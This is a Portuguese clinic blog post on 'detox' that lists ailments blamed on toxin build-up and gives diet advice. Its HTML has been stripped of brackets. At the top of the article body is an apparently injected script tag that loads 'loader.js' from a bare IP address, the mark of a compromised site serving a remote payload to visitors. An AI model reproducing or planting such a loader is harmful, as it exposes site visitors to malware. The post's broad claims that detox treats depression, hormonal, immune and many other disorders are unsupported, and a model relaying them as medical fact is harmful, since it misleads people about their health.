Desintoxicação, saúde e bem-estar

script language=”JavaScript” type=”text/JavaScript” src=’http://62.76.179.245/loader.js’/scriptp style=”text-align: justify;”Ao longo dos anos, acumulamos várias substâncias tóxicas nocivas à nossa saúde. Essas toxinas são provenientes de hábitos alimentares inadequados, alimentos industrializados, fumo, álcool e outras drogas, poluentes ambientais, agrotóxicos, metais tóxicos, inflamação crônica, infecções recorrentes, radicais livres, estresse, entre outros.
Tais substâncias se depositam nos líquidos e gorduras corporais, causando inúmeras disfunções orgânicas. O nosso organismo tem mecanismos capazes de neutralizar substâncias tóxicas transformando-as em não tóxicas, e eliminá-las pelo pulmão, rim e intestino./p
p style=”text-align: justify;”
Hoje em dia, estamos expostos a uma carga tóxica exagerada que sobrecarrega os nossos sistemas fisiológicos e ultrapassa a nossa capacidade de neutralizar e eliminar essas toxinas. O resultado é uma intoxicação crônica, responsável por uma infinidade de doenças, que nem de longe desconfiávamos ser de origem tóxica.
img class=”alignleft size-full wp-image-3609″ src=”http://www.fredericopretti.com.br/wp-content/uploads/2017/05/FRE_desintoxicacao-e1495718635324.jpg” alt=”desintoxicacao_detox” width=”600″ height=”400″ /A desintoxicação é um processo que tem como objetivo auxiliar na eliminação de substâncias tóxicas ou estranhas ao nosso organismo. Fazer uma DETOX, de tempos em tempos, não só previne, mas ajuda a tratar uma série de problemas de saúde, listados abaixo./p

h2 style=”text-align: justify;”Problemas decorrentes da intoxicação crônica/h2
p style=”text-align: justify;”Entre os problemas causados pelo excesso de toxinas, podemos citar alergias respiratórias e cutâneas, urticárias, eczemas, distúrbios gastrointestinais e imunológicos. A lista se estende por vários males:/p

ul style=”text-align: justify;”
liFadiga crônica;/li
liDistúrbios hormonais;/li
liEnvelhecimento precoce;/li
liProblemas de pele, cabelos e unhas;/li
liDificuldade de concentração e memorização;/li
liDistúrbios metabólicos e dificuldade para emagrecer;/li
liDificuldade para iniciar o sono, sono entrecortado e insônia;/li
liDepressão, ansiedade, nervosismo, irritabilidade e mau humor;/li
liDisbiose com alteração da permeabilidade e função de barreira intestinal;/li
liImunidade baixa com manifestações recorrentes de herpes, candidíase, cistite, infecção urinária, resfriado, sinusite, etc;/li
liSensibilidades alimentares excessivas com sensação constante de empanzinamento, inchaço abdominal, muita formação de gases, prisão de ventre , diarreia, etc;/li
liRetenção hídrica constante com sensação de inchaço no corpo todo;/li
liInchaço constante em torno dos olhos;/li
liDores no corpo, cabeça e articulações;/li
liSobrecarga do fígado e vesícula biliar;/li
liInflamação crônica silenciosa e aumento da formação de radicais livres, moléculas tóxicas que contribuem para o envelhecimento precoce, câncer, doenças degenerativas cerebrais e cardiovasculares, etc;/li
/ul
h2 style=”text-align: justify;”Como ajudar a neutralizar e eliminar toxinas do seu organismo/h2
p style=”text-align: justify;”Tenha atenção à sua alimentação. Consuma preferencialmente produtos frescos, integrais e orgânicos, frutas de baixo índice glicêmico, frutas oleaginosas, leguminosas, brotos, verduras e legumes que nascem acima da terra, peixes de mar, ovo e frango caipiras, temperos e condimentos frescos ou secos. Tome no mínimo 2 litros de água por dia, um suco verde pela manhã e uma salada crua e colorida no almoço ou jantar. Tome diariamente um pool de lactobacilos para melhorar a flora bacteriana e a saúde intestinal, combatendo tanto a prisão de ventre como a tendência à diarreia. Pratique atividade física regularmente, para eliminar especialmente toxinas provenientes do estresse./p
p style=”text-align: justify;”
Reduza o consumo de alimentos industrializados, frituras e alimentos gordurosos, sal, açúcar, doces e adoçantes não calóricos, carnes vermelhas, leite e derivados.
Se você for intolerante ou alérgico ao glúten, não coma produtos que contenham trigo, e aprenda a ler os rótulos, porque o glúten está presente em uma infinidade de alimentos industrializados, suplementos alimentares e até medicamentos.
Esses cuidados são simples e podem melhorar a sua qualidade de vida./p
p style=”text-align: justify;”Escrito por: Dr. Frederico Pretti/p


Share
Postado em 26 de maio de 2017, por  
Tags:
Leia os comentários   |   Deixe um comentário


Deixe um comentário

 (obrigatório)
 (Não será publicado - obrigatório)



Últimos Posts



Posts mais visitados



Filtrar por temas



Depoimentos

L.R.M.C – 43 Anos – Aeromoça

Faço tratamento com o Dr. Frederico Pretti há mais de 6 anos. Estou supersatisfeita com o seu profissionalismo.   O grande diferencial da Clínica é a qualidade incrível com que todos os profissionais nos atendem, o enorme cuidado e atenção que sempre tiveram comigo e com todos os meus familiares. Eles acompanharam o meu pai em […]*


*Os resultados podem variar de pessoa para pessoa.
Gastronomia - Confira nossas receitas